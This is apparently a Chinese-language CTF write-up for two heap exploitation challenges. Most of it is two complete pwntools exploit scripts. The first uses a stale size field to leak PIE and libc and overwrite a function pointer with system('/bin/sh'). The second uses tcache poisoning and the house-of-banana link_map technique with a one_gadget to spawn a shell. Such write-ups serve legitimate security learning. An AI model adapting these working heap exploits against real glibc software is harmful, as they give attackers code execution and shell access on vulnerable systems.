简单的溢出

修改name后,size字段并未更新,可以泄露PIE,和堆溢出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
from pwn import *
r = process('./note1')
e = ELF('./note1')
libc = e.libc
context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims			    :r.recvuntil(delims)
uu32    = lambda data               :u32(ru(data)[-4:].ljust(4, b'\0'))
uu64    = lambda data               :u64(ru(data)[-6:].ljust(8, b'\0'))
info_base = lambda tag, base        :r.info(tag + ': {:#x}'.format(base))
leak = lambda name,base :log.success('{} = {:#x}'.format(name, base))

def dbg(cmd):
	gdb.attach(r,cmd)
	pause()

def menu(num):
	ru(b'> ')
	sl(str(num).encode())

def new(index,length,desc,tag):
	menu(1)
	ru(b'id:')
	sl(str(index).encode())
	ru(b'name_length:')
	sl(str(length).encode())
	ru(b'name: ')
	se(desc)
	ru(b'tag')
	se(tag)
	ru(b'func:')
	sl(b'1')

def edit(index,choice,length,desc):
	menu(2)
	ru(b'id: ')
	sl(str(index).encode())
	ru(b'> ')
	sl(str(choice).encode())
	if choice == 1:
		ru(b'name_length')
		sl(str(length).encode())
		ru(b'name: ')
		sl(desc)
	if choice == 2:
		ru(b'new tag: ')
		se(desc)
	if choice == 3:
		ru(b'func:')
		sl(b'1')
def call(index):
	menu(3)
	ru(b'id:')
	sl(str(index).encode())

new(0,0x420,b'a'*0x420,b'a'*6)
edit(0,2,8,b'a'*8)
edit(0,3,8,b'')
call(0)
ru(b'a'*8)
base = u64(rl().strip().ljust(8,b'\x00'))-0x131b

edit(0,1,0x10,b'a')
new(1,0x20,b'a'*0x20,b'a'*6)
pl1 = b'a'*0x18 + p64(0x31) + b'a'*8 + p64(base+0x131b) + p64(base+e.got['puts']) + p64(0x500)
edit(0,1,0x41f,pl1)
call(1)
libc_base = uu64(b'\x7f')-libc.sym['puts']
leak("libc_base",libc_base)
sys = libc_base + libc.sym['system']

pl2 =b'a'*0x18 + p64(0x31)+ b'/bin/sh\x00' + p64(sys)
edit(0,1,0x41f,pl2)
call(1)

r.interactive()

复杂的溢出

这里学习到了一个新知识,之前没有学过house of banana,通过这题也差不多学到了,程序开启了PIE,所以寻址_rtld_global结构体里的的link_map类型的结构体

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
from pwn import *
r = process('./note2')
e = ELF('./note2')
libc = e.libc
context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims			    :r.recvuntil(delims)
uu32    = lambda data               :u32(ru(data)[-4:].ljust(4, b'\0'))
uu64    = lambda data               :u64(ru(data)[-6:].ljust(8, b'\0'))
info_base = lambda tag, base        :r.info(tag + ': {:#x}'.format(base))
leak = lambda name,base :log.success('{} = {:#x}'.format(name, base))

def dbg(cmd):
	gdb.attach(r,cmd)
	pause()

def menu(num):
	ru(b'> ')
	sl(str(num).encode())

def add(index,size,desc):
	menu(1)
	ru(b'Index?\n')
	sl(str(index).encode())
	ru(b'Size?\n')
	sl(str(size))
	ru(b'Enter content: ')
	sl(desc)

def delete(index):
	menu(2)
	ru(b'Index?\n')
	sl(str(index).encode())	

def show(index):
	menu(3)
	ru(b'Index?\n')
	sl(str(index).encode())

def leave():
	menu(4)

for i in range(9):
	add(i,0x88,b'a')

for i in range(8):
	delete(8-i)

show(1)
libc_base = uu64(b'\x7f')-0x219ce0
leak("libc_base",libc_base)
show(8)
rc(2)
heap_base = (u64(rl().strip().ljust(8,b'\x00')) << 12)
free_hook = libc_base + libc.sym['__free_hook']
offest = 0x26b2e0
link_map = libc_base + offest
shell = libc_base + 0xebcf1
leak("heap_base",heap_base)

delete(0) #0x120

add(9,0x110,b'a'*0x88 + p64(0x90+0x91) + b'a'*0x10)
delete(1)

target = (link_map-0x80) ^ (heap_base >> 12)

add(9,0x110,b'a'*0x88 + p64(0x91) + p64(target))
add(8,0x88,p64(shell))#0x3c0
add(7,0x88,b'a'*0x80 + p64(heap_base + 0x3c0 - 0x3d78))
sl(b'4')
# dbg('')
r.interactive()